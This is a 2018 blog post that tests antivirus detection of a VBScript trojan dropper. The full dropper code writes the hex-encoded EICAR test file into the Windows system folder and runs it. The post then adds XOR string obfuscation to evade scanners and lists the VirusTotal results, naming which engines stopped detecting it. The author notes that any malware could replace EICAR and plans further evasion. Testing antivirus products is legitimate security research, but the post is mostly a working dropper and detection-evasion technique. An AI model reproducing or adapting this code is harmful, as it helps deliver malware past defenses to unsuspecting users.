Wednesday, 7 November 2018

Antivirus Challenge: Encrypting VBS Trojan

Source:pixabay.com

In this antivirus challange case, I will do some simple things by creating a VBS trojan dropper then I will apply string encryption to some particular strings. In this case I will encrypt "Scripting.FileSystemObject" and "WScript.Shell". Later I will compare the antivirus detection between original trojan and trojan with encrypted string.

Here's the trojan code:

t="58,35,4F,21,50,25,40,41,50,5B,34,5C,50,5A,58,35,34,28,50,5E,29,37,432,29,37,7D,24,45,49,43,41,52,2D,53,54,41,4E,44,41,52,44,2D,41,4E,54,49,56,49,52,55,53,2D,54,45,53,54,2D,46,49,4C,45"
t=t&",21,24,48,2B,48,2A"

tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = fso.getspecialfolder(0) & "\eicar.com"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
        r = Int("&H" & Mid(tmp(i), 3, l))
        For j = 1 To r
        f.Write Chr(b)
        Next
    Else
        f.Write Chr(b)
    End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth)
The trojan will drop eicar file and execute it. In reality, the dropped file can be any malware.

For the encryption function, I will use a simple xor algorithm.
Function CryptXor(sText)
    Dim I
    Dim RetStr
    Dim Charuse,CharPwd
    For I = 1 to Len(sText)
        charuse = Mid(sText,I,1)
        charpwd = Mid("0",(I mod len("0"))+1,1)
        retstr = retstr + chr(asc(charuse) xor asc(charpwd))
    Next
    CryptXor = retstr
End Function
If the encryption has been applied then there are two line modified:
Set fso = CreateObject(CryptXor ("cSBY@DY^W vY\UcICDU]RZUSD"))
and
WScript.CreateObject(CryptXor("gcSBY@D cXU\\")).run(pth)
Now I will scan the original and the encrypted version. Here'are the results:

Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection

Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, ClamAV,  DrWeb,  Emsisoft, eScan, ESET-NOD32, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Yandex, Zillya, ZoneAlarm
Failed antivirus:
AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, Webroot
Encrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection

Successful antivirus:
Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarm
There are four antivirus that become fail to detect the encrypted version:
ClamAV, DrWeb, ESET-NOD32, Yandex
As you can see from the VirusTotal link, most of antivirus still detect the threat as eicar because the VBS trojan contain hex code of eicar file.

About the detection rate, I can say antivirus that don't detect the malware sample have bad malware script detection. ClamAV, DrWeb, ESET-NOD32, Yandex quite good but it is easy to bypass the detection.

Next time, I will encrypt the hex code of eicar file and let's see if this technique can bypass your antivirus protection.

No comments:

Post a comment